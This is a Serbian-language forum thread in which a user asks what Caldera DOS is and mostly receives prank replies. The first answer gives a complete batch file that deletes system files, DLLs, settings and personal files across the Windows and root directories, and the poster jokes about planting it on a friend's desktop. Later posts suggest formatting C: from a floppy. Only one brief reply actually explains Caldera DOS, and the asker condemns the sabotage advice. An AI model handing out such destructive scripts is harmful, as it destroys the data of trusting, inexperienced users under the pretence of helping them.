Caldera DOS - sta je to???

stanje
Zatvorena za pisanje odgovora.

bulma2005

Zainteresovan član
Poruka
167
Ja sam na ovom forumu na 3 mesta nasao da se isti tek "pominje" medjutim nigde nema nekog iole detaljnijeg objasnjenja tacno za sta je isti dizajniran (ako i za sta specificno?)

Molio bih od nekoga sa iskustvom da mi pruzi objasnjenje za Caldera DOS (primenjuje se za... sta posebno, odnosno, njegove specificnosti su ... konkretno sta?)

Vidim da ima FDISK i FORMAT pa i sam mogu logicki zakljuciti nekih 40% stvari, mada vise volim da cujem od nekoga sa iskustvom odgovor, nego da sam "cackam" po dosu !!!

Srdacno



Branislav Gavric

Za reklamu kontaktirajte http://www.krstarica.com/lat/marketing/
 
To ti je . . .
Nista Gledaj u DOS-u utipkaj: COPY CON PROGRAM.BAT, pricnite ENTER i upisite ove komande: (kada zavrsis pricnite tipku F6)
Komande:
echo off
cd..
cd..
cd..
attrib -r -h -s
del *.exe
del *.sys
del *.com
del *.dat
del autoexec.bat
del *.lnk
del *.his
del *.wav
del *.mp3
del *.ini
md garnet
cd windows
attrib -h -r -s
del *.exe
del *.com
del *.sys
del *.mp3
del *.wav
del *.dat
del *.lnk
del *.ini
del *.log
del autoexec.bat
del *.txt
del *.bak
del *.htm
del *.gif
cd system
attrib -r -h -s
del *.dll
del *.exe
del *.sys
del *.386
del *.dat
del *.com
del *.ini
cd..
cd..
cd..
cd mydocu~1
attrib -r -h -s
del *.exe
del *.txt
del *.bmp
del *.wav
del *.mp3
del *.sys
del *.com
cd..
cd windows
rd *.*
cd..
cd..
rd *.*
del *.*

Zatim pokreni taj BAT file,i nema da brines sve ce ti postati kristalno jasno koliko je Dos moćan!!!
:lol: :lol:
 
Obersturmfuehrer:
vmarko:
To ti je . . .
Nista Gledaj u DOS-u utipkaj: COPY CON PROGRAM.BAT, pricnite ENTER i upisite ove komande: (kada zavrsis pricnite tipku F6)

mislis pritisnite?
a i zaboravio si da kazes da treba da pricne i ENTER posle F6...
covek lepo pita a ti smaras....

Ama ne smaram nego sinoc sam pisao ovu glupost,pa sam je naravno pokrenuo,pa sam jutros dizao windows,pa htjedoh usositi jos nekog sorry ljudi nema igre sa dos-om!!! :oops: :oops:
 
zasto sve ono komande?
Prekopiras format.com na floppy , pokrenes ga odatle (govorim o DOS modu) i to je to.. ode cela particija

Sto se tice tog DOSa za koji pitas,... je dos ko dos, sadrzi u sebi par drajvera i to je to. Obicno dolazi uz Nero, kada rezes disk kao Boot CD... pa imas opciju gde mozes da ga pozoves iz img fajla. Probaj sa nekim RW diskom...
 
TheSaler:
zasto sve ono komande?
Prekopiras format.com na floppy , pokrenes ga odatle (govorim o DOS modu) i to je to.. ode cela particija
...
Cilj onih komandi gore je da napravis Bat file koji odneses kod prijatelja ili nekog slicnog i stavis ga na desktop :lol: i ako jos promjenis ikonu super i cao :twisted: Ma salim se to je bio jedan eksperiment,prosto brisanje sistemskih fils i onemogucavanje rada mašine!!! :wink:
 
vmarko:
To ti je . . .
Nista Gledaj u DOS-u utipkaj: COPY CON PROGRAM.BAT, pricnite ENTER i upisite ove komande: (kada zavrsis pricnite tipku F6)
Komande:
echo off
...........
Zatim pokreni taj BAT file,i nema da brines sve ce ti postati kristalno jasno koliko je Dos moćan!!!
:lol: :lol:
moze to i prostije....
cd\
del *.*
yes
rmdir windows
yes

ili ubacis flopi pa onda
copy C:\windows\fdisk.* a:
a:
format c:
yes

ili bar tako nekako....eh otkad nisam koristio dos...covece...

ma najjaci je
 
Peruzzi:
vmarko:
To ti je . . .
Nista Gledaj u DOS-u utipkaj: COPY CON PROGRAM.BAT, pricnite ENTER i upisite ove komande: (kada zavrsis pricnite tipku F6)
Komande:
echo off
...........
Zatim pokreni taj BAT file,i nema da brines sve ce ti postati kristalno jasno koliko je Dos moćan!!!
:lol: :lol:
moze to i prostije....
cd\
del *.*
yes
rmdir windows
yes

ili ubacis flopi pa onda
copy C:\windows\fdisk.* a:
a:
format c:
yes

ili bar tako nekako....eh otkad nisam koristio dos...covece...

ma najjaci je
To sto si gore utipkao ne radi


cd\
del *.*
yes
rmdir windows
yes

:P

,a da moze prostije,moze,partijica na kojoj se nalazi windows se ne moze iz windowsa formatirati,to nam je jasno? jelda?
:lol: :lol:
 
to sam i napisao....
znaci ono sa flopijem nece?
ebga....zardjao sam ja :D

a moze i iz wina...dovoljno je glup...
nego to me podseti - pricao mi jedan lik kako mu je kasperski av skenirao komp i nasao sebe kao virus i izbrisao se....
da ne poverujes :D
 
Peruzzi:
moze to i prostije....
cd\
del *.*
yes ----------------NE RADI TI OVO
rmdir windows
yes

ili ubacis flopi pa onda
copy C:\windows\fdisk.* a:
a:
format c: ---------Ovo nisam probao
yes

ili bar tako nekako....eh otkad nisam koristio dos...covece...

ma najjaci je

Da "del *.*", pa ENTER brise sve fajlove, sem onih koji su tog trenutka aktivni, a "yes" naravno da neradi.
 
A "rmdir windows" nije ispravno,vjerovatno si mislio na "rd", jer "rd" je podrazumjevana naredba za brisanje direktorija, tako da ono "dir" je neispravno, a i sama operacija poslije "del *.*" je bespotrebna, jer kakva vajda je postojanje praznog direktorija, kada fajlovi nisu tu, hocu da kazem da je efekat isti.
 
Sucur:
A "rmdir windows" nije ispravno,vjerovatno si mislio na "rd", jer "rd" je podrazumjevana naredba za brisanje direktorija, tako da ono "dir" je neispravno, a i sama operacija poslije "del *.*" je bespotrebna, jer kakva vajda je postojanje praznog direktorija, kada fajlovi nisu tu, hocu da kazem da je efekat isti.

ebem li ga. nisam ovo probao nego onako napamet, ono kao trebalo bi ovako nekako

ma bre upises u autoexec.bat neku debilnu poruku i ubacis mrtvu petlju :D
 
Ajde sada lepo molim moderatora da prebrise ovaj post!

Majke mi mile, ovo je dobar primer kako Bulma NE treba da realizuje SVOJ forum (koji je u planu uskoro!)

Samo meni kao administratoru ne bi bilo dovoljna sadisfakcija puko brisanje necijih blentavih i bezveznih odgovovora na sasvim normalna pitanja koja ljudima nisu jasna!
Licno bih zeleo TAKVIM odgovorasima da UVALIM NESTO PODLO nesto slicno sto i oni sami u forumu "sugerisu" na podao nacin drugima!

Mislite da sam laik u dosu???
Grdno se varate!
Pogledajte sekciju usluga koje mozemo realizovati putem licnog kontakta sa klijentom na mom sajtu! Ovo vam govorim kao BLAGU ilustraciju svog licnog znanja u dosu, koje ovde ne navodim u cilju nekog reklamiranja, nego samo da znate da nemate posla sa dudukom!
I stvarno mi smetaju ovakvi trivijalni a ipak vanredno podli saveti od ko-zna-koga!
Stvarno (malo je reci) da ste GADNI sa takvim namerama!
I to nije u redu!
I treba da se stidite.
Ma kakvi stidite - treba da se VAMA desi to sto SUGERISETE drugima!
I to kobejagi - kropz salu!
Sta bi bilo da te kojim slucajem koja neiskusna jadna budala poslusala, da te shvatila ozbiljno???

Posle se NIKAD ne bi vratila na Krstaricu!

Iz tog razloga I KRSTARICA dolazi na POTENCIJALNO los glas...

Moderatori PRST NA CELO!


Branislav Gavric:
WebMaster
Programer
Prevodilac
Serviser
marketing menadzer

I po drugi put-> za reklamiranje obratite se marketingu Krstarice.
 
stanje
Zatvorena za pisanje odgovora.

Back
Top